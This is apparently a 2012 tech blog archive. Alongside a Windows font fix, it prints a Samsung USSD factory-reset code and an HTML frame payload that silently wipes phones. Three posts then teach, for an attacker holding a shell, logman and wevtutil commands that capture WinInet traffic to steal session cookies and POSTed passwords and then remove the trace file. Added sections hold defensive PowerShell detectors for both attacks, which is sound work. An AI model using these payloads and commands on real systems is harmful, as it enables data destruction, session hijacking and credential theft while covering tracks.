Sunday, September 30, 2012

Unicode Filename in Windows 7

Today, all of a sudden, my Windows 7 no longer seems to display Unicode filenames in Windows Explorer. It didn't help even though I rebooted my laptop multiple times.

After searching the web, it seems the solution is simple.

  1. Go to c:\windows\fonts
  2. Right-click on the "MingLiU" font and choose "Show".
  3. Reboot.
To prevent it from happening again in the future:
  • From "Start", type "control" to open the "Control Panel".
  • At the top-right search box, type "fonts".
  • Choose "View installed fonts".
  • At the left pane, choose "Font settings".
  • Uncheck "Hide fonts based on language settings".

Tuesday, September 25, 2012

Wipe out/Factory Reset Samsung Android’s Phones

A major security vulnerability has been disclosed at the Ekoparty 2012 Security Conference which affects Samsung Android handsets.

It is possible to reset those handsets to factory default settings and, in the process, wipe out all data. The vulnerability abuses a "secret" code (actually a USSD code) that triggers the factory reset automatically, without asking the user for any confirmation. That code is: *2767*3855#

There are different methods known to date to push that code onto those handsets:

  • SMS in Wap Push mode (where the user would have to click on a link)
  • QR Code
  • NFC Protocol

Or, if users go to a website where the HTML page contains:
<frame src="tel:*2767*3855%23" />

So far, it has been confirmed to work against the Samsung Galaxy S3, Galaxy Beam, S Advance, Galaxy Ace and Galaxy S II, and some HTC devices.
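As an added example (not from the original post), here is a small PowerShell scanner that flags tel: URIs in an HTML page whose number part contains MMI/USSD characters (* or #), which is exactly how the frame above differs from an ordinary click-to-call link. The sample HTML is constructed for the example and uses the harmless IMEI display code *#06# as a stand-in.

```powershell
# Added example, not from the original post: detect tel: links carrying
# MMI/USSD-style codes (a plain phone number never contains * or #).
function Find-UssdTelLinks {
    param([Parameter(Mandatory)][string]$Html)

    $results = @()
    # Any src/href/data/action attribute whose value starts with "tel:"
    $attrPattern = '(?i)\b(?:src|href|data|action)\s*=\s*["'']?\s*(tel:[^"''\s>]+)'
    foreach ($m in [regex]::Matches($Html, $attrPattern)) {
        $raw = $m.Groups[1].Value
        # Strip the "tel:" scheme and decode %23 -> # so obfuscated codes are caught too
        $decoded = [uri]::UnescapeDataString($raw.Substring(4))
        if ($decoded -match '[*#]') {
            $results += [pscustomobject]@{ Raw = $raw; Decoded = $decoded }
        }
    }
    return $results
}

# Constructed sample page: one legitimate call link, two MMI-style frames
$sample = @'
<html><body>
<a href="tel:+15551234567">Call us</a>
<frame src="tel:*%2306%23" />
<iframe src="TEL:%2A%2306%23"></iframe>
</body></html>
'@

# Prints the two frame URIs, decoded to *#06#; the plain number is not reported
Find-UssdTelLinks -Html $sample | Format-Table -AutoSize
```

Run it over pages served through a proxy or saved by a crawler; anything it reports deserves a look, since there is no legitimate reason for a web page to dial an MMI code.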

Wednesday, September 19, 2012

Data Mining Event Tracing for Windows 3

This continues from the previous two posts.

The netsh utility has an interface to enable/disable event tracing for all providers that participate in a given "Scenario". You can tell it to use the "All" scenario, which enables logging for a large number of providers at the same time.

To start/stop the trace session:

C:\temp>netsh trace start scenario=all tracefile=FIREEVERYTHING2.etl capture=yes correlation=yes

Trace configuration:
-------------------------------------------------------------------
Status:             Running
Trace File:         FIREEVERYTHING2.etl
Append:             Off
Circular:           On
Max Size:           250 MB
Report:             Off

C:\temp>netsh trace stop
Correlating traces ... done
Generating data collection ... done
The trace file and additional troubleshooting information have been compiled as "C:\temp\".
File location = C:\temp\FIREEVERYTHING2.etl
Tracing session was successfully stopped.

The netsh utility correlates "like events" and generates several log files and reports containing some interesting data.

As expected, we have our "FIREEVERYTHING2.etl" file that we can query with wevtutil.exe. This file holds the information recorded by multiple providers and has all kinds of interesting data in it. But there is also a .CAB file that is worth checking out.

To check on human readable content:
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | more

Here is an example of searching for the "passwd" field in a POST with and without the /f:Text option. With /f:Text it finds zero occurrences, but without it, it finds two.
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | find /c /i "passwd"
0
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True | find /c /i "passwd"
2

These logs are not just recording actions taken by built-in programs like Internet Explorer. Any third-party tools that rely on the ETW-enabled APIs will also have their information recorded. So fire up the logging and go on a little treasure hunt!

Tuesday, September 18, 2012

Data Mining Event Tracing for Windows 2

This continues from the previous post.

The logman utility allows us to peer into an established SSL session and steal active session cookies after you have a shell on a box.

If you are able to sniff the administrator credentials, then you can even enable logging on a remote host using "logman -s <computername>".

Microsoft-Windows-WinInet is only one of the providers for which you can turn on logging. To see the full list of providers on your computer, you can:
c:\temp>logman query providers > listofproviders.txt

C:\temp>type listofproviders.txt | find /c "{"

This means there are a total of 643 providers available on my computer.

Monday, September 17, 2012

Data Mining Event Tracing for Windows

>>>> From

This is to show how to tap into the data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW).

The ETW providers log excessive amounts of information that may give an attacker access to sensitive data. By tapping into these otherwise silent logging mechanisms, an attacker can find all kinds of useful information.

Below is an example of "Sidejacking SSL Cookies": the cookies can be read out of the encrypted SSL session.

First, turn on the Event Tracing for WinInet.

c:\>cd \temp
c:\temp>logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets

From now on, all the WinInet connections and SSL sessions are logged.

To check the cookies:
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

To check the POST info (including password):
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"

To check some additional reconnaissance:

c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

To turn off your Event logging:

c:\temp>logman stop CookieStealer -ets

And remember to remove your "cookiesteal.etl" file.
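The flip side of the logman session above and the "netsh trace" session in the third post is that a running trace session is itself visible on the box. As an added example (not from the original posts), this PowerShell script enumerates running ETW sessions with logman and flags any that collect from a sensitive provider or write their .etl outside the Windows directory. It assumes an elevated prompt, that "logman query <name> -ets" prints an "Output Location:" line, and that the provider and known-session lists are starting points you extend for your environment.

```powershell
# Added example, not from the original posts: spot ad-hoc ETW trace sessions
# such as a "CookieStealer" session collecting Microsoft-Windows-WinInet events.
$SensitiveProviders = @('Microsoft-Windows-WinInet')   # provider used in the posts
$KnownSessions      = @('Circular Kernel Context Logger',  # usual built-in sessions
                        'EventLog-Application', 'EventLog-System', 'EventLog-Security')

function Get-RunningTraceSessions {
    # "logman query -ets" prints a padded table: <name>  <type>  <status>
    logman query -ets |
        Where-Object { $_ -match '\sTrace\s+Running\s*$' } |
        ForEach-Object { ($_ -split '\s{2,}')[0].Trim() }
}

function Test-TraceSession {
    param([Parameter(Mandatory)][string]$Name)
    $detail  = (logman query $Name -ets | Out-String)
    $reasons = @()

    # Does the session collect from a provider we consider sensitive?
    foreach ($p in $SensitiveProviders) {
        if ($detail -match [regex]::Escape($p)) { $reasons += "collects $p" }
    }
    # Assumption: logman prints "Output Location: <path>" for the .etl file;
    # a trace landing in a user-writable folder like C:\temp is suspicious
    if ($detail -match '(?m)^Output Location:\s*(.+?)\s*$') {
        $out = $Matches[1]
        if ($out -notlike 'C:\Windows\*') { $reasons += "writes to $out" }
    }
    if ($reasons.Count -gt 0) {
        [pscustomobject]@{ Session = $Name; Reasons = ($reasons -join '; ') }
    }
}

# Report every running session that is not on the known list and trips a check
Get-RunningTraceSessions |
    Where-Object { $KnownSessions -notcontains $_ } |
    ForEach-Object { Test-TraceSession -Name $_ } |
    Format-Table -AutoSize
```

Schedule it or wire it into your endpoint checks; a session flagged here should be stopped with "logman stop <name> -ets" and its .etl file reviewed for what was captured.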